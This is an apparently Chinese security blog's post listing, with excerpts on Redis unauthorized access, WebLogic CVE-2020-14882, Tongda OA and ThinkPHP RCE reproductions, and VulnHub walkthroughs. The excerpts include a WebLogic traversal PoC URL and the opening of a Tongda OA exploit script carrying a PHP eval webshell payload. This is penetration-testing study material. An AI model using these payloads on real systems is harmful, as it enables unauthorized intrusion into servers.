自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(15)
  • 资源 (1)
  • 收藏
  • 关注

原创 Redis未授权访问漏洞总结

一.漏洞描述Redis默认情况下,会绑定在0.0.0.0:6379(在redis3.2之后,redis增加了protected-mode,在这个模式下,非绑定IP或者没有配置密码访问时都会报错),如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源ip访问等等,这样将会将Redis服务暴露在公网上,如果在没有设置密码认证(默认为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问Redis以及读取Redis的数据。攻击者在未授权访问Redis的情况下,利用Redis自身的提供的c

2020-12-15 18:33:59 853

原创 CVE-2020-14882 | Weblogic未授权命令执行漏洞复现

环境安装首先电脑已安装好的jdk \bin目录下 然后java -jar 执行你的jar包就可以了Oracle WebLogic Server版本:10.3.6.0,12.1.3.0,12.2.1.3,12.2.1.4,14.1.1.0。均存在此漏洞。构造poc ,未授权访问后台地址http://127.0.0.1:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=AppDeploymentsCo

2020-11-04 13:27:41 1387

原创 渗透测试的流程

一般标准中的渗透测试流程1.测试范围确定双方共同指定一个规范,比如是否让做内网渗透,是否对业务系统渗透。2.测试时间确定做好时间规范,甲方会有时间准备,比如当天渗透了,甲方服务日报也不会误会是黑客入侵。3.可接受测试底线是否支持ddos,是否可以拖数据,支持爆破。4.信息搜集服务器信息,web信息,资产信息。5.漏洞发现进一步去查找漏洞。6.漏洞利用验证漏洞,并体现出漏洞价值。7.后渗透测试内网渗透,权限维持,提权,横向扩展。8.文档编写编写渗透测试报告,参与人员,时间,系统

2020-08-28 18:14:40 652 1

原创 通达OA 0day RCE漏洞复现

本次测试使用的是通达 OA V11.6版本。给出下载地址,http://www.kxdw.com/soft/23114.html下载好后,直接安装就可以。然后打开登录界面。登录文件有默认密码用某大佬写的EXPimport requests target="http://192.168.0.110/"payload="<?php eval($_POST['agan']);?>"print("[*]Warning,This exploit code will DELETE

2020-08-23 00:50:16 803

原创 Thinkphp框架 5.x远程命令执行漏洞复现

thinkphp 编辑ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的。最早诞生于2006年初,2007年元旦正式更名为ThinkPHP,并且遵循Apache2开源协议发布。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。并且拥有众多原创功能和特性,在社区团队的积极参与下,在易用性、扩展性和性能方面不断优化和改进。 [1]ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007

2020-07-06 17:04:49 476

原创 靶机:Lampiao

下载地址https://www.vulnhub.com/entry/lampiao-1,249/选择NAT模式或桥接模式都可以目标得到root权限信息收集kali的ip是192.168.174.129扫下c段 发现靶机ip 192.168.174.4开启了 22 80端口 进入80端口看下 然后查看页面源代码 没有发现东西dirb扫下目录 发现扫不到东西...

2020-07-06 15:36:30 776

原创 Struts2环境搭建及其复现

什么是Struts框架Struts2 是目前较为普及和成熟的基于MVC设计模式的web应用程序框架,它不仅仅是Struts1 的升级版本,更是一个全新的Struts架构。最初,是以WebWork框架和Struts框架为基础,通过提供增强和改进的Struts框架,进而实现简化web技术人员开发工作的目标。不久之后,Webwork框架和Struts社区联合创造了现在流行的Struts2框架。(摘自W3Cschool https://www.w3cschool.cn/struts_2/struts_overvi

2020-07-01 15:01:58 609

原创 靶机:BSides-Vancouver-2018-Workshop

靶机说明靶机用ValualBox创建,目标是在其上获得root级访问。目标Boot to root:获得root权限和Flag。运行环境靶机:通过ValualBox打开虚拟机,网络连接方式设置为主机模式(host-only),或者将虚拟机、Kali机都桥接到物理机的无线网卡。测试中使用VMWare导入虚机会无法获得IP,使用ValualBox可正常获得IP。攻击机:同网段下有Windows攻击机(物理机),安装有Nmap、Burpsuit、Wireshark、Sqlmap、nc、Hydra、Py

2020-06-30 16:16:43 529

原创 靶机:Quaoar

运行环境本靶机提供了OVA格式的镜像,官方推荐使用virtualbox,从Vulnhub下载之后,导入到viirtualbox即可运行。靶机:修改靶机的网络配置为桥接模式。攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。本靶机的渗透目标为渗透进靶机,找到flag,并拿到root权限。开始首先查看本机ip 192.168.1.25nmap扫一下网段 发现主机访问下80端口扫描下目录 发现后台登陆的地方弱口令admin登陆成功点击修改404界面 我直接把php反弹she

2020-06-23 17:23:06 840

原创 靶机:FristiLeaks_1.3

下载连接https://download.vulnhub.com/fristileaks/FristiLeaks_1.3.ova.torrent https://download.vulnhub.com/fristileaks/FristiLeaks_1.3.ova运行环境Virtualbox (二选一) Vnware Workstation playerVMware用户将需要手动将VM...

2020-05-10 17:47:00 907 1

原创 靶场:Freshly

下载地址:https://download.vulnhub.com/tophatsec/Freshly.ova运行环境: Virtualbox vm会报错目标:此靶机的目标是通过网络渗透进主机,并找到隐藏在敏感文件中的秘密。内容如下设置为桥接模式,kali扫描发现靶机地址,发现开启80 443 8080 端口访问80 端口 发现一张图片,查看源码均没有结果8080端口好像是一家糖果...

2020-05-03 19:57:15 616

原创 计算机组成原理

计算机组成原理1.计算机发展历史目前计算机已经跟我们的生活密不可分了,上网购物,银行转账,网络通信等都有计算机来控制,如果哪一天没有计算机,我们的生活真是不敢想象。计算机从开始到现在已有五、六十年的发展,可以说发展是相等的迅猛,让我们看看计算机的发展简史吧。0x1 第一台计算机 电子管计算机 (1946-1958年)世界上第一台电子计算机"ENIAC"于1946年2月14日在美国宾夕法尼...

2020-04-26 11:55:38 509

原创 计算机网络基础详解

计算机网络基础引言在各种孤独中间,人最怕精神上的孤独——巴尔扎克人是孤独的,所以我们需要与家人朋友交流和分享快乐,随着时代的进步,我们已经使用开始使用计算机和手机进行交流了。计算机同样也是孤独的个体,要想两台或多台机器之间互相通信,必须互通过互联网协议才能互相通讯。什么是互联网协议一系列统一的标准,这些标准称之为互联网协议,互联网的本质就是一系列的协议,总称为‘互联网协议’(Inter...

2020-04-23 14:46:50 385

原创 靶场: LazySysAdmin: 1

靶机 kali均为桥接模式找到kali ip后扫描c段 发现靶机192.168.1.10扫到端口页面都点进去看 源码也是 并没有什么东西用御剑扫描下目录试试发现 robots。Txt worpress phpadmin目录 访问一下访问backnode——files 目录访问wordpress访问phpmyadmin 没有密码在其他位置使用smn://192....

2020-03-06 16:50:42 1059

原创 breach1.0靶场

1.nmap扫描ip靶机端口2.进入首页http://192.168.110.140/3.查看页面源代码 发现两次base64解密<!------pgibbons:damnitfeelgoodtobeaganggoodtobeaganggoodtobeagangta ----->这个可能是某个地方的账号密码 (先记下来)4.点击主页图片 再进入5.发现一个登陆界面 ...

2020-03-05 17:34:26 573

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除